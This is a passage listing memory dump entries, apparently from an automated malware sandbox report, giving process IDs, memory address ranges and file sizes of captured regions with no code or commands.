memory/604-68-0x0000000002534000-0x0000000002537000-memory.dmpFilesize
12KB
-
memory/604-69-0x000000000253B000-0x000000000255A000-memory.dmpFilesize
124KB
-
memory/604-64-0x000007FEFC311000-0x000007FEFC313000-memory.dmpFilesize
8KB
-
memory/604-152-0x0000000000000000-mapping.dmp
-
memory/604-65-0x000007FEF3F90000-0x000007FEF49B3000-memory.dmpFilesize
10.1MB
-
memory/604-62-0x0000000000000000-mapping.dmp
-
memory/664-157-0x0000000000000000-mapping.dmp
-
memory/776-106-0x000000000283B000-0x000000000285A000-memory.dmpFilesize
124KB
-
memory/776-104-0x000000001B800000-0x000000001BAFF000-memory.dmpFilesize
3.0MB
-
memory/776-103-0x0000000002834000-0x0000000002837000-memory.dmpFilesize
12KB
-
memory/776-102-0x000007FEF3430000-0x000007FEF3F8D000-memory.dmpFilesize
11.4MB
-
memory/776-101-0x000007FEF3F90000-0x000007FEF49B3000-memory.dmpFilesize
10.1MB
-
memory/776-107-0x0000000002834000-0x0000000002837000-memory.dmpFilesize
12KB
-
memory/776-96-0x0000000000000000-mapping.dmp
-
memory/776-108-0x000000000283B000-0x000000000285A000-memory.dmpFilesize
124KB
-
memory/856-105-0x0000000000000000-mapping.dmp
-
memory/896-139-0x000007FEF3430000-0x000007FEF3F8D000-memory.dmpFilesize
11.4MB
-
memory/896-132-0x0000000000000000-mapping.dmp
-
memory/896-138-0x000007FEF3F90000-0x000007FEF49B3000-memory.dmpFilesize
10.1MB
-
memory/896-142-0x0000000001194000-0x0000000001197000-memory.dmpFilesize
12KB
-
memory/896-147-0x0000000001194000-0x0000000001197000-memory.dmpFilesize
12KB
-
memory/896-148-0x000000000119B000-0x00000000011BA000-memory.dmpFilesize
124KB
-
memory/912-81-0x0000000000000000-mapping.dmp
-
memory/952-89-0x0000000000000000-mapping.dmp
-
memory/1056-87-0x0000000000000000-mapping.dmp
-
memory/1100-70-0x0000000000000000-mapping.dmp
-
memory/1136-83-0x0000000000000000-mapping.dmp
-
memory/1140-156-0x0000000000000000-mapping.dmp
-
memory/1276-151-0x00000001400014E0-mapping.dmp
-
memory/1280-140-0x0000000000000000-mapping.dmp
-
memory/1328-127-0x00000000011E4000-0x00000000011E7000-memory.dmpFilesize
12KB
-
memory/1328-126-0x00000000011E4000-0x00000000011E7000-memory.dmpFilesize
12KB
-
memory/1328-124-0x000007FEF3DD0000-0x000007FEF492D000-memory.dmpFilesize
11.4MB
-
memory/1328-123-0x000007FEF4930000-0x000007FEF5353000-memory.dmpFilesize
10.1MB
-
memory/1328-121-0x0000000000000000-mapping.dmp
-
memory/1328-128-0x00000000011EB000-0x000000000120A000-memory.dmpFilesize
124KB
-
memory/1432-79-0x0000000000000000-mapping.dmp
-
memory/1468-144-0x0000000000000000-mapping.dmp
-
memory/1468-91-0x0000000000000000-mapping.dmp
-
memory/1476-63-0x0000000077A90000-0x0000000077C39000-memory.dmpFilesize
1.7MB
-
memory/1476-55-0x000000013F4D0000-0x00000001401B9000-memory.dmpFilesize
12.9MB
-
memory/1476-98-0x000000013F4D0000-0x00000001401B9000-memory.dmpFilesize
12.9MB
-
memory/1476-61-0x000000013F4D0000-0x00000001401B9000-memory.dmpFilesize
12.9MB
-
memory/1476-54-0x000000013F4D0000-0x00000001401B9000-memory.dmpFilesize
12.9MB
-
memory/1476-58-0x000000013F4D0000-0x00000001401B9000-memory.dmpFilesize
12.9MB
-
memory/1476-56-0x0000000077A90000-0x0000000077C39000-memory.dmpFilesize
1.7MB
-
memory/1476-59-0x000000013F4D0000-0x00000001401B9000-memory.dmpFilesize
12.9MB
-
memory/1476-99-0x0000000077A90000-0x0000000077C39000-memory.dmpFilesize
1.7MB
-
memory/1476-57-0x000000013F4D0000-0x00000001401B9000-memory.dmpFilesize
12.9MB
-
memory/1476-60-0x000000013F4D0000-0x00000001401B9000-memory.dmpFilesize
12.9MB
-
memory/1488-149-0x0000000000000000-mapping.dmp
-
memory/1508-77-0x0000000000000000-mapping.dmp
-
memory/1528-134-0x0000000000000000-mapping.dmp
-
memory/1560-150-0x0000000000000000-mapping.dmp
-
memory/1616-130-0x0000000000000000-mapping.dmp
-
memory/1620-71-0x0000000000000000-mapping.dmp
-
memory/1652-155-0x0000000000000000-mapping.dmp
-
memory/1692-146-0x0000000000000000-mapping.dmp
-
memory/1724-90-0x0000000000000000-mapping.dmp
-
memory/1728-115-0x000000013FF50000-0x0000000140C39000-memory.dmpFilesize
12.9MB
-
memory/1728-161-0x0000000077A90000-0x0000000077C39000-memory.dmpFilesize
1.7MB
-
memory/1728-117-0x000000013FF50000-0x0000000140C39000-memory.dmpFilesize
12.9MB
-
memory/1728-120-0x0000000077A90000-0x0000000077C39000-memory.dmpFilesize
1.7MB
-
memory/1728-114-0x000000013FF50000-0x0000000140C39000-memory.dmpFilesize
12.9MB
-
memory/1728-119-0x000000013FF50000-0x0000000140C39000-memory.dmpFilesize
12.9MB
-
memory/1728-116-0x000000013FF50000-0x0000000140C39000-memory.dmpFilesize
12.9MB
-
memory/1728-125-0x000000013FF50000-0x0000000140C39000-memory.dmpFilesize
12.9MB
-
memory/1728-118-0x000000013FF50000-0x0000000140C39000-memory.dmpFilesize
12.9MB
-
memory/1728-113-0x000000013FF50000-0x0000000140C39000-memory.dmpFilesize
12.9MB
-
memory/1728-141-0x0000000077A90000-0x0000000077C39000-memory.dmpFilesize
1.7MB
-
memory/1728-110-0x0000000000000000-mapping.dmp
-
memory/1728-160-0x000000013FF50000-0x0000000140C39000-memory.dmpFilesize
12.9MB
-
memory/1752-112-0x000000013FF50000-0x0000000140C39000-memory.dmpFilesize
12.9MB
-
memory/1788-74-0x0000000000000000-mapping.dmp
-
memory/1796-154-0x0000000000000000-mapping.dmp
-
memory/1816-78-0x000007FEF4930000-0x000007FEF5353000-memory.dmpFilesize
10.1MB
-
memory/1816-86-0x000000001B7C0000-0x000000001BABF000-memory.dmpFilesize
3.0MB
-
memory/1816-92-0x00000000027E4000-0x00000000027E7000-memory.dmpFilesize
12KB
-
memory/1816-80-0x000007FEF3DD0000-0x000007FEF492D000-memory.dmpFilesize
11.4MB
-
memory/1816-95-0x00000000027EB000-0x000000000280A000-memory.dmpFilesize
124KB
-
memory/1816-94-0x00000000027E4000-0x00000000027E7000-memory.dmpFilesize
12KB
-
memory/1816-153-0x0000000000000000-mapping.dmp
-
memory/1816-72-0x0000000000000000-mapping.dmp
-
memory/1840-158-0x0000000000000000-mapping.dmp
-
memory/1932-159-0x00000001407F25D0-mapping.dmp
-
memory/1932-162-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1932-163-0x00000000000E0000-0x0000000000100000-memory.dmpFilesize
128KB
-
memory/1932-166-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/2004-137-0x0000000000000000-mapping.dmp
-
memory/2004-88-0x0000000000000000-mapping.dmp
-
memory/2012-84-0x0000000000000000-mapping.dmp
-
memory/2016-145-0x0000000000000000-mapping.dmp
-
memory/2032-143-0x0000000000000000-mapping.dmp
-
memory/2036-82-0x0000000000000000-mapping.dmp
-
memory/2036-133-0x0000000000000000-mapping.dmp